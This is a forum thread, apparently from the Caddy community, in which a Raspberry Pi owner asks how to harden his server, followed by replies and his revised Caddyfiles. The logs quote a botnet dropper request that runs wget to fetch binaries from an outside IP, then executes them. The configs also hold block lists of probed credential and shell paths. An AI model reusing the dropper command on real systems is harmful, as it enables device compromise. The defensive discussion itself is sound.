Request for advice on some server security hardening

Well this ended up being a much longer post than I anticipated. I can’t wait to immediately find a glaring mistake the moment after I press submit.

And yep, had some very obvious mistakes…cleaned up a little bit at least and added an extra edit below too.

1. The problem I’m having:

I realize what I’m asking help for and I know it is not some silver bullet of a hardened caddy server that I’m looking for so please keep that in mind. That would be cool, but this is more of an “academic” exercise as well as a “oh you want to be a jerk trying to hack my server?!?!? Well I can be a jerk too!” kind of thing and one thing has led to another and I’m not ready to say I’ve done enough and am ready to move on from this side quest just yet.

Where I’m at: Running my caddy server on a rasberry pi 4b, v2.9.1 with these modules (not using all of them currently, but they’re there):

caddy.logging.encoders.transform
dns.providers.cloudflare
http.authentication.providers.authorizer
http.handlers.authenticator
http.ip_sources.cloudflare
security

Currently, I have a set of growing paths that people love poking at via my ip address, not the actual domain I have setup, that are obviously people up to no good. So I setup fail2ban so they get blocked for a bit if they look too hard where they have no business looking. Just so we’re all clear here, there isn’t anything where they are looking and even if there was anything there, they would be very disapointed with any kind of prize they may think is behind the door.

This server is really only for me and through hard work and a series of silly/bad decisions, it’s ready to be torn down and rebuilt at any moment if needed without any issues since I finally picked up ansible along the way too (good enough at least). No backups or anything like that even. It’s that kind of a project (for now at least) and it’s fun, so all is good.

So here I am last night, admiring what I finally accomplished…auto blocking those jerks at a low level. It’s not really anything that special or mind blowing. The only access to this whole pi server is through the two ports I had to open up on my router for caddy anyway. It just makes me laugh thinking there are a handful (dozens of them!) of people out there potentially thinking, “we got another target guys!..wait, wtf, he blocked me!”

I swear I had been in a state of “doneness” for like 20 minutes when I looked at the logs only to see a large number of

TLS handshake error from aaa.bbb.ccc.ddd:xxxx: EOF

log messages just pouring in from many different ip addresses. That shouldn’t be happening to this random guy playing around with his raspberry pi in the dark recesses of the internet! Seems like they got me this time! Jerks! I just unplugged for the night and upon review this morning, some dude sent my server a malicious request and seconds later, those handshake errors started flooding in from all over. In total, about 2500 handshake errors in about 10 minutes before I disconnected.

It was a GET request to (formatted for legibility):

/shell?
killall+-9+arm7;
killall+-9+arm4;
killall+-9+arm;
killall+-9+/bin/sh;
killall+-9+/bin/sh;
killall+-9+/z/bin;
killall+-9+/bin/bash;
cd+/tmp;
rm+arm4+efefa7;
wget+http:/\\/176.65.134.201/efefa7;
chmod+777+efefa7;
./efefa7+jaws;
wget+http:/\\/176.65.134.201/drea4;
chmod+777+drea4;
./drea4+jaws

While I have questions about how a GET request to the endpoint in question could cause so much havoc, this link seems to describe the culprit. Automated Malware Analysis Report for drea4.elf - Generated by Joe Sandbox. I don’t hang out in those forums/community, so apologies if that’s not the best source. It says the same things I witnessed though. I also was unable to access the ip addresses in the request this morning when I finally realized what that thing was trying to do.

Would caddy even try to run something like that? The site behind the ip address that request went to is literally just a one pager of a template I settled on after some searching around. No programming stuff going on behind the scenes running it other than what caddy itself is doing serving it. There are projects on on the pi that caddy controls and do their programming things, just not the project immediately related to this post.

Still here? Ok, so I’m in a situation I wouldn’t have thought even possible 24 hours ago and I refuse to give up!

I see two routes I could pursue and I’m not sure which is best given what I currently know, so here is a long message about it all. If there are any other potential routes to proceed down, feel free to suggest anything that you think makes more sense.

Option 1: I would like to continue using fail2ban as the keeper of ip address blocking since that’s its only job and at least one person has pointed out to another person somewhere on the internet, that since it isn’t caddies primary job, it makes sense not to have caddy be fully responsible for those things as well. I agree and also wanted to add more bells and whistles to my setup.

Again, I’m well aware that this is not some kind of impenetrable shield I’m attempting to build here. I just mostly want to while adding at least a sliver of extra protection.

The general idea is when someone makes a request that has “shell” (there are other, more benign looking ones, but no leeway for any of them now!) in it, immediate ban after first attempt for a good length of time. After that event, place the caddy server in a kind of heightened alert mode that will then also start immediately banning ip addresses that are generating the TLS handshake errors. I didn’t crunch the numbers, but a cursory look seems to suggest this will at least help a little.

Problems here though are that those logs are of the debug level and fail2ban is pretty clear not to use that level of logging for it because it could get into some recursive situation. Don’t know enough myself to confirm if it matters here. Also, I’d want to isolate those logs away from the main access.json log to make things easier for fail2ban to deal with (performance as well as signal to noise ratio). It’s also not yet clear to me how to capture, reformat, and redirect those “http.stdlib” log messages. Even if this isn’t the right play here, I’m still curious how I could do that for whatever reason I dream up next. Any ideas?

Option 2 seems to be that GitHub - mholt/caddy-l4: Layer 4 (TCP/UDP) app for Caddy has what I’m looking for. I know enough to know that it appears to be the other thing to look into before going down any other rabbit holes. Am I right in that respect? Any pointers to make getting started go a little faster?

I’m still new to all this caddy stuff and it seemed like I’d reached a point where getting the advice and recommendations of those that have been around this stack for a bit was a good play. So here I am. Hooray! Thoughts? Criticisms? Concerns? Other ideas or directions worth knowing or looking at?

2. Error messages and/or full log output:

Because you insist, here are the logs around when the incident happened. Also, that user-agent was not modified by me. What a joker, KrebsOnSecurity, haha!

{"level":"debug","ts":1743133375.275426,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.71.150.158:55139: EOF"}
{"level":"debug","ts":1743133375.3402927,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.71.150.158:38793: EOF"}
{"level":"debug","ts":1743133375.404855,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.71.150.158:49119: EOF"}
{"level":"info","ts":1743133409.019054,"logger":"http.log.access","msg":"handled request","request":{"remote_ip":"141.98.11.27","remote_port":"48758","client_ip":"141.98.11.27","proto":"HTTP/1.1","method":"GET","host":"73.44.80.71:80","uri":"/shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\\/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\\/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws","headers":{"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"],"Accept-Encoding":["gzip, deflate"],"Accept-Language":["en-US,en;q=0.9"],"Connection":["keep-alive"],"Cache-Control":["max-age=0"],"User-Agent":["KrebsOnSecurity"]}},"bytes_read":0,"user_id":"","duration":0.000070981,"size":0,"status":308,"resp_headers":{"Server":["Caddy"],"Connection":["close"],"Location":["https://73.44.80.71/shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\\/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\\/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws"],"Content-Type":[]}}
{"level":"debug","ts":1743133416.8338058,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:15651: EOF"}
{"level":"debug","ts":1743133416.8857992,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:28987: EOF"}
{"level":"debug","ts":1743133416.9374268,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:18445: EOF"}
{"level":"debug","ts":1743133416.9876194,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:19959: EOF"}
{"level":"debug","ts":1743133417.0401726,"logger":"http.stdlib","msg":"http: TLS handshake error from 162.158.98.141:52527: EOF"}
{"level":"debug","ts":1743133419.0467026,"logger":"http.stdlib","msg":"http: TLS handshake error from 172.70.176.48:38007: EOF"}

3. Caddy version:

v2.9.1 h1:OEYiZ7DbCzAWVb6TNEkjRcSCRGHVoZsJinoDR/n9oaY=
dan@pi:~ $ uname -a
Linux pi 6.6.74+rpt-rpi-v8 #1 SMP PREEMPT Debian 1:6.6.74-1+rpt1 (2025-01-27) aarch64 GNU/Linux

Additional installed modules listed above also.

4. How I installed and ran Caddy:

xcaddy build --with github.com/caddy-dns/cloudflare --with github.com/caddyserver/transform-encoder --with github.com/WeidiDeng/caddy-cloudflare-ip --with github.com/greenpau/caddy-security

eventually became below, note file size...

-rwxrwxr-x  1 dan  dan  56819896 Mar 19 06:00 caddy_cloudflare_transform-encoders_cloudflare-ip_security

then moved to here. Again note file size.

dan@pi:~/sandbox $ ls -al /usr/bin/ | grep caddy
-rwxr-xr-x  1 root root    56819896 Mar 19 06:32 caddy

a. System environment:

Rasberry Pi 4b. Running with trixie and not bookworm also. No containers here. Also, who knew doing things the “simple” way is way more complicated and time consuming?

dan@pi:~/sandbox $ uname -a
Linux pi 6.6.74+rpt-rpi-v8 #1 SMP PREEMPT Debian 1:6.6.74-1+rpt1 (2025-01-27) aarch64 GNU/Linux

dan@pi:~/sandbox $ sudo systemctl status caddy --no-pager --full
● caddy.service - Caddy
     Loaded: loaded (/usr/lib/systemd/system/caddy.service; enabled; preset: enabled)
     Active: active (running) since Fri 2025-03-28 02:29:37 CDT; 10h ago
 Invocation: 2a88964d75894827b1c815160f5486c1
       Docs: https://caddyserver.com/docs/
    Process: 7360 ExecReload=/usr/bin/caddy reload --config /etc/caddy/Caddyfile --force (code=exited, status=0/SUCCESS)
   Main PID: 785 (caddy)
      Tasks: 18 (limit: 8752)
        CPU: 20.785s
     CGroup: /system.slice/caddy.service
             └─785 /usr/bin/caddy run --environ --config /etc/caddy/Caddyfile

Mar 28 08:45:22 pi systemd[1]: Reloading caddy.service - Caddy...
Mar 28 08:45:23 pi caddy[7126]: {"level":"info","ts":1743169523.1853957,"msg":"using config from file","file":"/etc/caddy/Caddyfile"}
Mar 28 08:45:23 pi caddy[7126]: {"level":"info","ts":1743169523.2041965,"msg":"adapted config to JSON","adapter":"caddyfile"}
Mar 28 08:45:23 pi caddy[7126]: {"level":"warn","ts":1743169523.2042677,"msg":"Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies","adapter":"caddyfile","file":"/etc/caddy/Caddyfile","line":105}
Mar 28 08:45:23 pi systemd[1]: Reloaded caddy.service - Caddy.
Mar 28 09:01:34 pi systemd[1]: Reloading caddy.service - Caddy...
Mar 28 09:01:34 pi caddy[7360]: {"level":"info","ts":1743170494.731064,"msg":"using config from file","file":"/etc/caddy/Caddyfile"}
Mar 28 09:01:34 pi caddy[7360]: {"level":"info","ts":1743170494.7477531,"msg":"adapted config to JSON","adapter":"caddyfile"}
Mar 28 09:01:34 pi caddy[7360]: {"level":"warn","ts":1743170494.7478254,"msg":"Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies","adapter":"caddyfile","file":"/etc/caddy/Caddyfile","line":105}
Mar 28 09:01:34 pi systemd[1]: Reloaded caddy.service - Caddy.

The caddy fmt --overwrite command was eventually ran. Ignore those.

b. Command:

I don't understand what this is asking for that is not already provided elsewhere here. Sounds a bit condescending if you ask me though lol.

c. Service/unit/compose file:

dan@pi:~/sandbox $ cat /usr/lib/systemd/system/caddy.service
# caddy.service
#
# For using Caddy with a config file.
#
# Make sure the ExecStart and ExecReload commands are correct
# for your installation.
#
# See https://caddyserver.com/docs/install for instructions.
#
# WARNING: This service does not use the --resume flag, so if you
# use the API to make changes, they will be overwritten by the
# Caddyfile next time the service is restarted. If you intend to
# use Caddy's API to configure it, add the --resume flag to the
# `caddy run` command or use the caddy-api.service file instead.

[Unit]
Description=Caddy
Documentation=https://caddyserver.com/docs/
After=network.target network-online.target
Requires=network-online.target

[Service]
Type=notify
User=caddy
Group=caddy
ExecStart=/usr/bin/caddy run --environ --config /etc/caddy/Caddyfile
ExecReload=/usr/bin/caddy reload --config /etc/caddy/Caddyfile --force
EnvironmentFile=/var/lib/caddy/.local/share/caddy/env
TimeoutStopSec=5s
LimitNOFILE=1048576
PrivateTmp=true
ProtectSystem=full
AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE

[Install]
WantedBy=multi-user.target

d. My complete Caddy config:

{
	debug
	default_sni danengle.dev
	acme_dns cloudflare slkdlksflklkksflsdj
	log {
		output file /var/log/caddy/access.json {
			roll_size 500MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
	}
	servers {
		trusted_proxies cloudflare {
			interval 12h
			timeout 15s
		}
		client_ip_headers Cf-Connecting-Ip
	}
}

# Not favorite block of code, but make it work took priority at the time.
# So no judgement zone right here! Suggestions welcome, I know what I've done.
# Also, this is not the main focus right now. The mostly dupe towards bottom of file is.
# You will probably notice these are imported strangely where they are used, that's
# because sometimes it would make sense when they were working, then it wouldn't
# make sense when they stopped behaving as I had expected. Then eventually I 
# didn't need to move them to figure anything out so they stayed were they were last
# placed. Also, in order for them to properly work I need to figure out how to
# handle the clouldflare proxy client_ip/request_ip header related things which
# I was unaware of that being a thing when these were first constructed.
(sus_paths) {
	@not_sus {
		path /
		path /_next/static/chunks/*
		path /favicon.ico
		not {
			path /.env
			path /.env.*
			path /.git/*
			path /wp-config.php
			path /config.php
			path /wp-admin/*
			path /administrator/*
			path /vendor/*
			path /*connector.php
			path /*wmanifest.xml
			path /.aws/credentials
			path /php_info.php
			path /debug.php
			path /status.php
			path /info.php
			path /php.php
			path /backup
			path /wordpress
			path /portal
			path /demo
			path /cms
		}
	}
	@sus {
		path /.env
		path /.env.*
		path /.git/*
		path /wp-config.php
		path /config.php
		path /wp-admin/*
		path /administrator/*
		path /vendor/*
		path /*connector.php
		path /*wmanifest.xml
		path /.aws/credentials
		path /php_info.php
		path /debug.php
		path /status.php
		path /info.php
		path /php.php
		path /backup
		path /wordpress
		path /portal
		path /demo
		path /cms
		path /next.config.js
	}
	# log_skip @not_sus
	log @sus {
		output file /var/log/caddy/security_blocks.log {
			roll_size 500MB
			roll_keep 5
			roll_keep_for 720h
		}
		format transform "{ts}|[remote|{request>remote_ip}][client|{request>client_ip}][meth|{request>method}][host|{request>host}][uri|{request>uri}][status|{status}]" {
			time_format wall_milli
		}
		level INFO
	}
	handle @sus {
		respond "Access Denied" 403
	}
}
danengle.dev {
	tls {
		dns cloudflare slkslksslkjsdf
	}

	import sus_paths danengle.dev

	log {
		output file /var/log/caddy/dashboard-dev.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
		level DEBUG
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:3035
}

*.danengle.dev {
	tls {
		dns cloudflare sljhsfdsfdihsf
	}

	import sus_paths star.danengle.dev

	log {
    # There will eventually be another reverse_proxy here...
    # Not sure how to move away from this generic "star" named log.
    # It gets the job done just fine currently so it's still here like this
		output file /var/log/caddy/star.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
		level DEBUG
	}

	@umami host umami.danengle.dev
	handle @umami {
		encode zstd gzip
		file_server
		reverse_proxy localhost:3333
	}
}

pihole.local {
	log {
		output file /var/log/caddy/pihole.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:8080
}

pi.local {
	root * /var/www/pi-home
	log {
		output file /var/log/caddy/pi-home.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
	}
  # For goaccess log viewer so pi.local/logs updates in realtime
  # Just threw it here at the time to test out and haven't decided
  # to move to a more appropriate place yet
	@websockets {
		header Connection *Upgrade*
		header Upgrade websocket
	}
	reverse_proxy @websockets localhost:7890
	encode zstd gzip
	import sus_paths pi.local
	file_server
}

# Left this here but it's no longer in use since the main ip address based config below took over
direct.local {
	root * /var/www/ip-direct-home
	log {
		output file /var/log/caddy/ip-direct-home.access.json {
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
		format json
	}
	encode zstd gzip
	import sus_paths ip-direct.local
	file_server

	handle_errors 404 {
		rewrite * /404.html
		file_server
	}
}
s3.garage.local, *.s3.garage.local {
	log {
		output file /var/log/caddy/s3.garage.access.json {
			format json
			roll_size 1gb
			roll_keep 5
			roll_keep_for 720h
		}
	}
	reverse_proxy localhost:3900 {
	}
}

web.garage.local {
	reverse_proxy localhost:3902 {
	}
}

admin.garage.local {
	reverse_proxy localhost:3903 {
	}
}
http://73.44.80.71, https://73.44.80.71 {
	tls internal

	root * /var/www/ip-direct-home

	@not_susss {
		path /
		path /favicon.ico
		path /.well-known/*
		path /robots.txt
		path /assets/css/*
	}
  # There has got to be a better "caddy" way of doing this...
  # Also, I just added paths as they appeared in logs and haven't
  # gone back yet for cleanup/refactor/simplification.
	@susss {
		path /.env
		path /*/.env
		path /*.env*
		path /.git/*
		path /.git/config*
		path /*/.git/config
		path /wp-config.php
		path /config.php
		path /wp-admin/*
		path /administrator/*
		path /vendor/*
		path /*connector.php
		path /*wmanifest.xml
		path /.aws/credentials
		path /credentials*
		path /*routes
		path /php_info.php
		path /debug.php
		path /status.php
		path /info.php
		path /php.php
		path /*/eval-stdin.php
		path /backup
		path /wordpress
		path /portal
		path /demo
		path /cms
		path /next.config.js
		path /form.html
		path /geopip/
		path /*password.php
		path /*.php
		path /geoserver*
		path /phpmyadmin
		path /*phpstorm
		path /cgi-bin*
		path /cgi-bin/*bin*
		path /*invokefunction*
		path /login.rsp
		path /device.rsp*
		path /*login.esp
		path /*formLogin*
		path /*/login
		path /login
		path /*/exporttool/*
	}

	log

	log @susss {
		output file /var/log/caddy/connect_to_ip.log {
			roll_size 500MB
			roll_keep 5
			roll_keep_for 720h
		}
		format transform "{ts}[remote_ip|{request>remote_ip}][client_ip|{request>client_ip}][method|{request>method}][host|{request>host}][uri|{request>uri}][status|{status}]" {
			time_format wall_milli
		}
		level INFO
	}

	log_skip @not_susss

	handle @susss {
		respond "Access Denied" 403
	}

	encode zstd gzip
	file_server

	handle_errors 404 {
		rewrite * /404.html
		file_server
	}
}

Edit: Updated the ip address site directive to have the http and https versions. Stops many 308 responses in the logs. Makes sense after the fact, just a little detail that escaped me while getting this all up going.

Other clean up also in progress but I don’t want to deal with the copy/paste into here right now.

5. Links to relevant resources:

I guess I might as well paste links to fail2ban stuff that I’ve been using. It honestly seems not quite sufficient to me, but that could just be the newness of getting into the nitty gritty of it all.
https://fail2ban.readthedocs.io/en/latest/index.html

https://github.com/fail2ban/fail2ban/wiki

Thanks for taking the time to get this far!

Honestly, I skimmed the long post. It’s too long :slight_smile:

You’re thinking and worrying too much. Caddy will not serve nor execute any of those stuff listed in @suss unless they’re under the path specified in the root directive, which by definition should only contain public files. Caddy doesn’t execute random commands received from random clients.

2 Likes

You are correct on all counts @Mohammed90 !

To follow up in case anyone ever ends up here…I’m chalking up my kneejerk reaction to just that. I did have fail2ban working, but eventually decided it’s not necessary.

For one, blocking anyone effectively from actual dns routes would require interacting with the cloudflare api. Those people come from cloudflare ip addresses so that wouldn’t make sense to block a cloudflare ip address that is forwarding requests for users with a different ip. Cloudflare does send that info in the headers so it is actionable, just not worth the effort for me. The docs I found made it seem simple, but I wasn’t able to successfully get them to work in an acceptable way in the short amount of time I looked into it. Plus, ensuring they are syncronized is just another layer of stuff I don’t care to worry about right now.

I still want to return “access denied” messages for certain requests and I’ve added the rate_limiter module as well. It’s enough of “pain in the butt barrier” for me. Below is a genericized and slightly simplified version of my current Caddyfile. Hopefully it’ll help someone down the road.

# The command I used for creating the caddy bin that is running evertyhing
# defined below was:
# CADDY_VERSION=v2.10.0-beta.4.0.20250329141543-5a6b2f8d1d46 xcaddy build \
#   --with github.com/caddy-dns/cloudflare \
#   --with github.com/caddyserver/transform-encoder \
#   --with github.com/WeidiDeng/caddy-cloudflare-ip \
#   --with github.com/greenpau/caddy-security \
#   --with github.com/mholt/caddy-events-exec \
#   --with github.com/dunglas/mercure \
#   --with github.com/mholt/caddy-l4 \
#   --with github.com/mholt/caddy-ratelimit
# The CADDY_VERSION variable was determined by what mholt/caddy-events-exec said
# it required and errored the build command on when I attempted to run the
# xcaddy build command with the regular v2.9.1 caddy installed.
#
# As of 2025-04-14, the CADDY_VERSION is still the one caddy-events-exec wants.
# The created caddy binary stands at 59M in size on my raspberry pi 4B with
# go version go1.24.2 linux/arm64
#
# I have not gotten around to exploring mercure or caddy-l4 modules yet
# so nothing they provide is shown below. Probably someday, just not today.
#
{
	debug
  # https://caddyserver.com/docs/json/apps/http/servers/tls_connection_policies/default_sni/
	default_sni example.dev
  # For those using cloudflare stuff
  # https://github.com/caddy-dns/cloudflare
	acme_dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
  # Logs all the stuff which includes things like (with debug enabled)
  # "logger":"tls.cache","msg":"added certificate to cache"
	log {
		output file /var/log/caddy/access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
	}
  # Was expirmenting with mail server stuff and some wanted certs in specific
  # locations and also with other specific ownships so the idea here was to
  # create a mail.example.dev route block and have caddy manage the creation
  # and updating of them. I haven't yet fully committed to any specific mail
  # setup or determined the best way ensure the correct owhership and movement
  # of the certs for those applications so this doesn't really do anything
  # useful for me currently. leaving here for a fuller example.
	events {
		on cert_obtained exec /var/lib/caddy/.local/share/caddy/sandbox/certs.sh {event.data.identifier} {event.data.issuer} {event.data.certificate_path} {event.data.metadata_path} {event.data.private_key_path} {event.data.renewal}
	}
  # More cloudflare stuff. Have to have built caddy with https://github.com/WeidiDeng/caddy-cloudflare-ip
	servers {
		trusted_proxies cloudflare {
			interval 12h
			timeout 15s
		}
		client_ip_headers Cf-Connecting-Ip
	}
}
# Shared block to return "access denied" responses to things normal people
# wouldn't be looking for. I don't know for sure if this is correct, but
# seems like it probably is, but the paths are ordered so that more specific
# paths should match first and return early before hitting the more general * paths.
# and in theory be better for performance. The paths were generated from observed
# connections to my server so there wasn't any exact method for it. Just observe
# react and eventually ended up with this.
(susser) {
	@sus {
		path /.env
		path /.git/config
		path /wp-config.php
		path /config.php
		path /.aws/credentials
		path /password.php
		path /next.config.js
		path /backup
		path /demo
		path /form.html
		path /geopip/
		path /geoip/
		path /login.rsp
		path /phpmyadmin
		path /portal
		path /wordpress
		path /Admin*
		path /administrator*
		path /cgi-bin*
		path /credentials*
		path /device.rsp*
		path /geoserver*
		path /hello.world*
		path /HNAP1/*
		path /php-cgi*
		path /plugins*
		path /shell*
		path /solr*
		path /odinhttpc*
		path /vendor*
		path /wp-admin*
		path /.vscode*
		path /*.env
		path /*aspx
		path /*composer.json
		path /*connector.php
		path /*eval-stdin.php
		path /*first.txt
    # Not sure exactly why, but paths such as /core/.git/config were getting
    # past when just /*git/config was specified
		path /*git/config
    path /*/.git/config
		path /*javascript.html
		path /*login.esp
		path /*man.txt
		path /*mij.txt
		path /*overview.js
		path /*panel.txt
		path /*password.php
		path /*phpstorm
		path /*routes
		path /*uitleg.txt
		path /*wmanifest.xml
		path /*bin/sh*
		path /*.env*
		path /*git/config*
		path /*disable_function*
		path /*wp-admin/*
		path /*vendor/phpunit*
		path /*phpunit/phpunit*
		path /*exporttool*
		path /*invokefunction*
		path /*formLogin*
	}

	log sus.log {
		output file /var/log/caddy/sus.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		no_hostname
		format filter {
      # Don't include parts that don't seem necessary for this use case 
      # and keeps file sizes smaller.
			fields {
				request>remote_port delete
				request>proto delete
				request>headers>Connection delete
				request>headers>Upgrade-Insecure-Requests delete
				request>headers>Pragma delete
				request>headers>Cf-Visitor delete
				request>headers>Cdn-Loop delete
				request>headers>Accept-Encoding delete
				request>headers>X-Forwarded-Proto delete
				request>headers>Cache-Control delete
				request>headers>Sec-Gpc delete
				request>tls>resumed delete
				request>tls>proto delete
				resp_headers>Alt-Svc delete
				resp_headers>Content-Type delete
			}
			wrap json
		}
		level INFO
	}
	handle @sus {
		log_name sus.log
		respond "Access Denied" 403
	}
}
(rate_limit_logger) {
	log rate_limit.log {
		output file /var/log/caddy/rate_limit.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		no_hostname
		format filter {
			fields {
				request>remote_port delete
				request>proto delete
				request>headers>Connection delete
				request>headers>Upgrade-Insecure-Requests delete
				request>headers>Pragma delete
				request>headers>Cf-Visitor delete
				request>headers>Cdn-Loop delete
				request>headers>Accept-Encoding delete
				request>headers>X-Forwarded-Proto delete
				request>headers>Cache-Control delete
				request>headers>Sec-Gpc delete
				request>tls>resumed delete
				request>tls>proto delete
				resp_headers>Alt-Svc delete
				resp_headers>Content-Type delete
			}
			wrap json
		}
		level DEBUG
	}
	handle_errors 429 {
		log_name rate_limit.log
	}
}
example.dev {
	tls {
    dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
	}
	import susser
  # Using https://github.com/mholt/caddy-ratelimit for rate_limiting
  # If rate_limits start getting hit and it the paths fall into sus territory,
  # the rate_limit will block before the sus path can be handled.
  # Specific events and windows just chosen by feeling at this point.
	import rate_limit_logger
	rate_limit {
		zone static_example {
			match {
				method GET
			}
			key static
			events 120
			window 30s
		}
		zone dynamic_example {
			key {remote_host}
			events 14
			window 6s
		}
		log_key
		jitter 0.75
	}
	log {
		output file /var/log/caddy/example.dev.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:3035
}
# This route may eventually serve mail via a web interface, but it
# was created initially so caddy would create and manage certs for the uri.
mail.example.dev {
	tls {
    dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
	}
	root * /var/www/mail.example.dev
	import susser
	import rate_limit_logger
	rate_limit {
		zone static_mail {
			match {
				method GET
			}
			key static
			events 120
			window 30s
		}
		zone dynamic_mail {
			key {remote_host}
			events 18
			window 6s
		}
		log_key
	}
	log {
		output file /var/log/caddy/mail.example.dev.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	encode zstd gzip
	file_server
}

*.example.dev {
	tls {
    dns cloudflare {$CLOUDFLARE_DNS_API_TOKEN}
	}
	import susser
	import rate_limit_logger
	rate_limit {
		zone static_star {
			match {
				method GET
			}
			key static
			events 200
			window 30s
		}
		zone dynamic_star {
			key {remote_host}
			events 24
			window 6s
		}
		log_key
	}
	log {
		output file /var/log/caddy/star.example.dev.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
  # Using https://umami.is/docs for some event tracking. The app itself is
  # a nextjs application.
	@umami host umami.example.dev
	handle @umami {
		encode zstd gzip
		file_server
		reverse_proxy localhost:3333
	}
}
# Basic https://pi-hole.net/ install. Other than customizing some settings
# post install, just ran the basic installer for system level items
pihole.internal {
	log {
		output file /var/log/caddy/pihole.internal.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	encode zstd gzip
	file_server
	reverse_proxy localhost:8080
}
# Content here is a simple template from https://html5up.net/. A /var/www/pi.internal/logs
# was created for viewing the output from a goaccess instance setup according to
# https://goaccess.io/get-started. Run that with something like
# /usr/local/bin/goaccess \
#   /var/log/caddy/example.dev.access.json \
#   .../other/log/files... \
#   -o /var/www/pi.internal/logs/index.html \
#   --log-format=CADDY \
#   --real-time-html \
#   --ws-url=pi.local:443
# The global access.json log file should not be included in the list because
# other log types can cause errors. The websockets directive is there specifically
# for goaccess realtime updates. I don't leave goaccess running and just turn it
# on and off with systemctl as needed.
pi.internal {
	root * /var/www/pi.internal
	log {
		output file /var/log/caddy/pi.internal.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	@websockets {
		header Connection *Upgrade*
		header Upgrade websocket
	}
	reverse_proxy @websockets localhost:7890
	encode zstd gzip
	file_server
}
# Routes for garagehq, a selfhosted s3 like file service provider.
# Followed https://garagehq.deuxfleurs.fr/documentation/quick-start/
# and not much additional work needed. Have only actually used the s3.garage
# routes thus far so only know those work for sure. Personally found the
# health checks too noisy and have them disabled but leaving here for completeness
s3.garage.internal, *.s3.garage.internal {
	log {
		output file /var/log/caddy/s3.garage.internal.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	reverse_proxy localhost:3900 {
		health_uri      /health
		health_port     3900
		health_interval 15s
		health_timeout  5s
  }
}
web.garage.internal {
	reverse_proxy localhost:3902
}
admin.garage.internal {
	reverse_proxy localhost:3903
}
# For all those folks that hit my server by ip address directly and my internal
# network. Don't use the rate limiter here mostly for data collection reasons.
# The content served is another simple template grabbed from https://html5up.net/
http://a.b.c.d, https://a.b.c.d http://10.0.0.2, https://10.0.0.2 {
	tls internal
	root * /var/www/ip-direct
	import susser
	log {
		output file /var/log/caddy/ip.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level DEBUG
	}
	encode zstd gzip
	file_server
	handle_errors 404 {
		rewrite * /404.html
		file_server
	}
}

1 Like